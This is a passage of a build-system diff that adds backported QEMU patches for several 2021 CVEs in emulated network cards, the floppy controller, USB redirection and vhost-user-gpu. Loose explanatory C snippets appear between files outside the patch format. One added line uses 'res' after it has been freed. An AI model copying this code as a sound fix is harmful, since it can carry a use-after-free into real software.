+--- qemu-4.2.0.orig/hw/net/lan9118.c
++++ qemu-4.2.0/hw/net/lan9118.c
+@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
+ /* FIXME: Honor TX disable, and allow queueing of packets. */
+ if (s->phy_control & 0x4000) {
+ /* This assumes the receive routine doesn't touch the VLANClient. */
+- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
new file mode 100644
index 0000000000..5e53e20bac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
+From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:13:22 +0800
+Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index d7d05ae30..cf22c4f07 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
+
+ NetClientState *nc = qemu_get_queue(s->nic);
+ if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
new file mode 100644
index 0000000000..3fc469e3e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
+From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:57:40 +0800
+Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
+ loopback packet
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/dp8393x.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
+index 205c0decc..533a8304d 100644
+--- a/hw/net/dp8393x.c
++++ b/hw/net/dp8393x.c
+@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
+ s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
+ if (nc->info->can_receive(nc)) {
+ s->loopback_packet = 1;
+- nc->info->receive(nc, s->tx_buffer, tx_len);
++ qemu_receive_packet(nc, s->tx_buffer, tx_len);
+ }
+ } else {
+ /* Transmit packet */
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
new file mode 100644
index 0000000000..93202ebcef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
+From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:14:35 +0800
+Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/sungem.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/sungem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/sungem.c
++++ qemu-4.2.0/hw/net/sungem.c
+@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
+ NetClientState *nc = qemu_get_queue(s->nic);
+
+ if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
new file mode 100644
index 0000000000..40b4bd96e7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
+From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:27:52 +0800
+Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet_iov() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/net_tx_pkt.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/net_tx_pkt.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
++++ qemu-4.2.0/hw/net/net_tx_pkt.c
+@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
+ NetClientState *nc, const struct iovec *iov, int iov_cnt)
+ {
+ if (pkt->is_loopback) {
+- nc->info->receive_iov(nc, iov, iov_cnt);
++ qemu_receive_packet_iov(nc, iov, iov_cnt);
+ } else {
+ qemu_sendv_packet(nc, iov, iov_cnt);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
new file mode 100644
index 0000000000..b3b702cca4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
+From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Fri, 26 Feb 2021 13:47:53 -0500
+Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/rtl8139.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/rtl8139.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/rtl8139.c
++++ qemu-4.2.0/hw/net/rtl8139.c
+@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
+ }
+
+ DPRINTF("+++ transmit loopback mode\n");
+- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
+
+ if (iov) {
+ g_free(buf2);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
new file mode 100644
index 0000000000..ed716468dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
+From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 10:33:34 -0500
+Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/pcnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
+index f3f18d859..dcd3fc494 100644
+--- a/hw/net/pcnet.c
++++ b/hw/net/pcnet.c
+@@ -1250,7 +1250,7 @@ txagain:
+ if (BCR_SWSTYLE(s) == 1)
+ add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
+ s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
+- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
+ s->looptest = 0;
+ } else {
+ if (s->nic) {
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
new file mode 100644
index 0000000000..f4a985604e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
+From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:33:43 -0500
+Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/cadence_gem.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+Index: qemu-4.2.0/hw/net/cadence_gem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/cadence_gem.c
++++ qemu-4.2.0/hw/net/cadence_gem.c
+@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
+ /* Send the packet somewhere */
+ if (s->phy_loop || (s->regs[GEM_NWCTRL] &
+ GEM_NWCTRL_LOCALLOOP)) {
+- gem_receive(qemu_get_queue(s->nic), tx_packet,
++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
+ total_bytes);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), tx_packet,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
new file mode 100644
index 0000000000..4ff3413f8e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
+From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
+Date: Thu, 18 Nov 2021 12:57:32 +0100
+Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the 82078 datasheet, if the end-of-track (EOT byte in
+the FIFO) is more than the number of sectors per side, the
+command is terminated unsuccessfully:
+
+* 5.2.5 DATA TRANSFER TERMINATION
+
+ The 82078 supports terminal count explicitly through
+ the TC pin and implicitly through the underrun/overrun
+ and end-of-track (EOT) functions. For full sector
+ transfers, the EOT parameter can define the last
+ sector to be transferred in a single or multisector
+ transfer. If the last sector to be transferred is a
+ partial sector, the host can stop transferring the data
+ in mid-sector, and the 82078 will continue to complete
+ the sector as if a hardware TC was received. The
+ only difference between these implicit functions and
+ TC is that they return "abnormal termination" result
+ status. Such status indications can be ignored if they
+ were expected.
+
+* 6.1.3 READ TRACK
+
+ This command terminates when the EOT specified
+ number of sectors have been read. If the 82078
+ does not find an ID Address Mark on the diskette
+ after the second occurrence of a pulse on the
+ INDX# pin, then it sets the IC code in Status
+ Register 0 to "01" (Abnormal termination), sets the
+ MA bit in Status Register 1 to "1", and terminates
+ the command.
+
+* 6.1.6 VERIFY
+
+ Refer to Table 6-6 and Table 6-7 for information
+ concerning the values of MT and EC versus SC and
+ EOT value.
+
+* Table 6-6. Result Phase Table
+
+* Table 6-7. Verify Command Result Phase Table
+
+Fix by aborting the transfer when EOT > # Sectors Per Side.
+
+Cc: qemu-stable@nongnu.org
+Cc: Hervé Poussineau <hpoussin@reactos.org>
+Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
+Reviewed-by: Hanna Reitz <hreitz@redhat.com>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
+CVE: CVE-2021-3507
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ hw/block/fdc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index 347875a0cdae..57bb355794a9 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
+ int tmp;
+ fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
+ tmp = (fdctrl->fifo[6] - ks + 1);
++ if (tmp < 0) {
++ FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
++ fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
++ fdctrl->fifo[3] = kt;
++ fdctrl->fifo[4] = kh;
++ fdctrl->fifo[5] = ks;
++ return;
++ }
+ if (fdctrl->fifo[0] & 0x80)
+ tmp += fdctrl->fifo[6];
+ fdctrl->data_len *= tmp;
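
For reference, the sign check added above can be illustrated in isolation
(hypothetical EOT and sector values, not QEMU code):

    #include <stdio.h>

    int main(void)
    {
        int eot = 2;               /* fifo[6]: last sector requested by the guest */
        int ks  = 5;               /* start sector of the transfer */
        int tmp = eot - ks + 1;    /* -2: the request runs past the end of track */

        if (tmp < 0) {
            printf("abnormal termination, transfer refused\n");
            return 1;
        }
        printf("sectors to transfer: %d\n", tmp);
        return 0;
    }
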
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 0000000000..77a5385692
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+ if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+ next == NULL ||
+ /* Work around for Linux usbfs bulk splitting + migration */
+- (totalsize == (16 * KiB - 36) && p->int_req)) {
++ (totalsize == (16 * KiB - 36) && p->int_req) ||
++ /* Next package may grow combined package over 1MiB */
++ totalsize > 1 * MiB - ep->max_packet_size) {
+ usb_device_handle_data(ep->dev, first);
+ assert(first->status == USB_RET_ASYNC);
+ if (first->combined) {
+--
+GitLab
+
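
For reference, the headroom of one max_packet_size in the new limit means that
appending the next packet can never push the combined transfer past 1 MiB; an
illustrative standalone sketch (must_flush is a made-up helper and MiB is
defined locally for the sketch):

    #include <stdbool.h>
    #include <stdio.h>

    #define MiB (1024u * 1024u)

    static bool must_flush(unsigned totalsize, unsigned max_packet_size)
    {
        return totalsize > MiB - max_packet_size;
    }

    int main(void)
    {
        unsigned mps = 1024;
        printf("%d\n", must_flush(MiB - 512, mps));   /* 1: flush before appending more */
        printf("%d\n", must_flush(64 * 1024, mps));   /* 0: keep combining */
        return 0;
    }
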
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
+From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:12 +0200
+Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Use autofree heap allocation instead.
+
+Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/redirect.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 17f06f3417..6a75b0dc4a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
+ .endpoint = ep,
+ .length = p->iov.size
+ };
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+ /* No id, we look at the ep when receiving a status back */
+ usb_packet_copy(p, buf, p->iov.size);
+ usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
+@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+ &bulk_packet, NULL, 0);
+ } else {
+- uint8_t buf[size];
++ g_autofree uint8_t *buf = g_malloc(size);
+ usb_packet_copy(p, buf, size);
+ usbredir_log_data(dev, "bulk data out:", buf, size);
+ usbredirparser_send_bulk_packet(dev->parser, p->id,
+@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
+ USBPacket *p, uint8_t ep)
+ {
+ struct usb_redir_interrupt_packet_header interrupt_packet;
+- uint8_t buf[p->iov.size];
++ g_autofree uint8_t *buf = g_malloc(p->iov.size);
+
+ DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
+ p->iov.size, p->id);
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
new file mode 100644
index 0000000000..1b4fcbfb60
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
+vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
+ g_critical("%s: resource creation failed %d %d %d",
+ __func__, c2d.resource_id, c2d.width, c2d.height);
+ g_free(res);
++ vugbm_buffer_destroy(&res->buffer);
+ cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+ return;
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
+
+
+Check whether 'res' already has a backing attached, to avoid a
+memory leak.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 204f01b3 ("virtio-gpu: fix memory leak
+ in resource attach backing")
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-4-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0 context]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
++ if (res->iov) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
++ return;
++ }
++
+ ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
+ if (ret != 0) {
+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
+
+If the guest triggers the following sequence, the attach_backing will be leaked:
+
+vg_resource_create_2d
+vg_resource_attach_backing
+vg_resource_unref
+
+This patch fixes this by freeing 'res->iov' in vg_resource_destroy.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c ("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-5-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+[vhost-user-gpu does not exist in 4.2.0]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
+ }
+
+ vugbm_buffer_destroy(&res->buffer);
++ g_free(res->iov);
+ pixman_image_unref(res->image);
+ QTAILQ_REMOVE(&g->reslist, res, next);
+ g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
+vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
+
+The 'res->iov' will be leaked if the guest triggers the following sequence:
+
+virgl_cmd_create_resource_2d
+virgl_resource_attach_backing
+virgl_cmd_resource_unref
+
+This patch fixes this.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c ("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
